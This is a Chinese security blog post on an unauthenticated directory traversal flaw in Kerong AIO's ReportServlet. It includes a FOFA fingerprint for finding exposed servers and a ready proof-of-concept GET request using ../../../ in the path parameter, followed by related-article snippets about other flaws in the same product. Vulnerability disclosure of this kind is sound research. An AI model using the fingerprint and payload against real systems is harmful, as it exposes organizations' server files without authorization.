科荣AIO ReportServlet存在目录遍历漏洞

最新推荐文章于 2025-03-27 15:24:41 发布
原创 最新推荐文章于 2025-03-27 15:24:41 发布 · 708 阅读 · 7 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #网络安全

本文介绍科荣AIO企业管理软件的目录漏洞,涉及未授权文件路径泄露,通过GET请求进行漏洞利用。建议联系厂商更新至最新安全版本以保护系统安全。

文章目录

产品简介

科荣AIO是一款企业管理软件,提供企业一体化管理解决方案。它整合了ERP(如进销存、财务管理)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),并集成了电子商务平台、支付平台等功能

漏洞概述

科荣AIO ReportServlet存在目录漏洞,未授权的攻击者利用该漏洞导致服务器的文件路径泄露。

指纹识别

fofa:

body="changeAccount('8000')"

漏洞利用

poc:

GET /ReportServlet?operation=getFileList&path=../../../ HTTP/1.1
Host: you_ip
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

在这里插入图片描述

修复建议

联系软件厂商更新至最新安全版本。

【少年如何久年少,少年如何长少年。】

【1day】致远OA帆软组件 ReportServer 目录遍历漏洞学习
记录并分享学习安全的知识点..
09-28 3036
致远OA 帆软组件 ReportServer接口存在目录遍历漏洞,攻击者通过漏洞可以获取服务器敏感信息。
AIO存在目录遍历漏洞
weixin_43567873的博客
03-28 124
AIO存在目录遍历漏洞
AIO ReportServlet存在任意文件读取漏洞
3tefanie的博客
12-28 587
【聪明是与生俱来的,善良不是。善良需要勇气,勇气像稞田一样需要灌溉,一旦你把聪明放在善良前面,想着要有足够的智能与能力才能去遂行善良。这种人在得到能力后多半只会将极少的部分用在行善,因为他们崇拜的不是善良,是能力,他们不相信善良,只相信能力。】
目录遍历漏洞
最新发布
2401_83164661的博客
03-27 1435
当用户请求的文件或目录存在,或者发生其他与文件访问相关的错误时,应用程序应返回通用的错误信息,而不是详细的文件路径或系统错误信息,避免给攻击者提供有用的线索。本文章主要用于分享目录遍历漏洞基础学习,以下是对目录遍历漏洞的一些个人解析,请大家结合参考其他文章中的相关信息进行归纳和补充。在处理用户输入的路径之前,先对其进行规范化处理,将路径转换为标准格式,消除其中可能存在的。需要注意的是,在进行漏洞验证时,应确保在合法的测试环境中进行,避免对生产环境造成破坏或引发安全问题。尝试使用不同的文件扩展名,如。
目录遍历漏洞原理、解决方案
qq_44005305的博客
03-10 9879
目录遍历(路径遍历)是由于web服务器或者web应用程序对用户输入的文件名称的安全性验证不足而导致的一种安全漏洞,使得攻击者通过利用一些特殊字符就可以绕过服务器的安全限制,访问任意的文件(可以使web目录以外的文件),甚至执行系统命令。
ReportServlet.rar
04-20
web应用引入润乾报表 java工具类 report4-1.4.jar,web.xml 中配置reportServlet (com.runqian.report4.view.ReportServlet.class) 通过weblgic标准项目部署(war包)启动,reportServlet 加载抛错 :Report licenses is not the server version, replace the correct version; 其实是ReportServlet.class 中获取授权文件时用到getrealpath未正确获取路径。
Web程序,使用ReportSerivce报表对象模型编程发布报表
weixin_34284188的博客
10-10 160
Web程序,使用ReportSerivce报表对象模型编程发布报表前一段时间在公司做了一个需要用到sql server2005 reportserivce服务的项目,我主要负责reportserivce的报表模块部分.为了方便报表的发布,所以做了报表的添加,删除管理页面.下面就记录一下我的做的添加表报功能页面:下面最终做的添加管理页面:接着,说说具体的步骤:首先定义一个报表项目ReportItem...
Reporting Sercvices报表
寂寞的一只狗的博客
04-10 293
介绍   报表通过表格、图表等格式来动态显示数据,用公式表示即为:         “报表=多样的格式+动态的数据”                  报表的主要特点的数据动态化,格式多样化。         通过EXCEL可以制作复杂格式额的报表,但是EXCEL没有定义专门的报表结构来动态地加载报表数据         所以数据是静态的,不能动态变化               
AIO ReportServlet 任意文件读取漏洞复现
0xSec
12-28 1138
AIO ReportServlet 接口处存在任意文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
AIO系统 UtilServlet 代码执行漏洞
iSee857的博客
09-14 314
AIO管理系统存在命令执行漏洞,攻击者可以通过构造恶意请求,进行远程代码执行。可导致服务器失陷,为确保系统安全,建议尽快修复漏洞。如⾮必要,禁⽌公⽹访问该系统。请及时升级产品到最新版本。
AIO moffice SQL注入漏洞复现
0xSec
06-29 987
AIO moffice 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
AIO管理系统 moffice接口SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
07-26 422
AIO管理系统moffice接口存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
在servlet中使用jasperreport展示报表
yan_tu的博客
05-23 1768
之前说过如何将jasperreport集成到spring mvc当中,但有些场景中我们也会通过servlet+jsp+jasperreport的方式来展示报表内容,本文就这种方式简单介绍一下如何在servlet中使用jasperreport来展示报表,包括实现步骤,具体实现内容,参数传递方式等。 1、使用mysql数据库,创建报表测试数据库testreport,并创建相关业务表,这里根据
JasperReport+Servlet Web应用之:打印
我的IT技术杂谈
01-17 418
关于JasperReport的简介大家可以去google上去查,在这里就不作介绍了。   我的开发环境:MyEclipse 5.5 GA+iReport-nb-3.5.2。所用的JasperReport版本也是:jasperreports-3.5.2 所需要的jar可以从下面的lib1,lib2中获得,所有jar包除了iTextAsian.jar外都可以从jasperreports-3.5....
AIO多个接口存在任意文件读取漏洞
m0_46604997的博客
04-25 452
AIO企业一体化管理解决方案,通过ERP(进销存财务)、OA(办公自动化)、CRM(客户关系管理)、UDP(自定义平台),集电子商务平台、支付平台、ERP平台、微信平台、移动APP等解决了众多企业客户在管理过程中跨部门、多功能、需求多变等通用及个性化的问题。AIO管理系统多个接口存在文件读取漏洞,该漏洞可能导致泄露配置信息、用户数据等敏感信息,为确保系统安全,建议尽快修复漏洞,并且设置有效的输入验证和访问控制机制。Fofa语法:body="changeAccount('8000')"
HttpServletRequest获取上传文件
weixin_45659202的博客
02-18 7075
从HttpServletRequest获取MultipartFile MultipartResolver resolver = new CommonsMultipartResolver(request.getSession().getServletContext()); MultipartHttpServletRequest multipartHttpServletRequest = resolver.resolveMultipart(request); Map<String, Multipart
java selvert实例_java servlet 代码样例 (demo)
weixin_31295867的博客
02-13 523
今天又搞了下jsp +servlet 的代码样例,感觉虽然搭了好多次,可是每次还是不记得那些参数,都要去网上搜索,索性自己把这次的简单demo给记录下来,供下次使用的时候直接复制吧。这个web逻辑 input.jsp ---->ReportServlet -->output.jsp (在servlet中输入值,将参数传递到output.jsp中)整个文档目录结构如下:相关代码如下:in...
Servlet服务最全入门笔记(包含案例)
PIKapikaaaa的博客
04-15 711
servlet最全入门笔记啊 Http协议 生命周期 进化史 处理请求 转发与重定向
Servlet相关概念及其功能使用
java编程学习_java基础教程_booyzhang的博客
05-26 2662
Servlet概述 Servlet 是Java Server Applet的简称,称为小服务器程序,用Java编写的服务器端程序,主要功能交互式地浏览和修改数据,生成动态Web内容。 Servlet运行于支持Java的应用服务器中。从实现上讲,Servlet可以响应任何类型的请求,但绝大多数情况下Servlet只用来扩展基于HTTP协议的Web服务器。 Servlet编程需要使用到javax.servlet 和 javax.servlet.http两个包下面的类和接口,在所有的类和接口中,javax.se
AIO管理系统V7版学习手册:从零基础到实战
AIO管理系统V7版-用户手册》是公司针对其AIO管理系统V7版发布的一份详细文档,旨在帮助用户从零开始学习和掌握该系统的使用。以下是从该用户手册中能够提取的知识点,包括了系统功能、操作流程、安装配置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值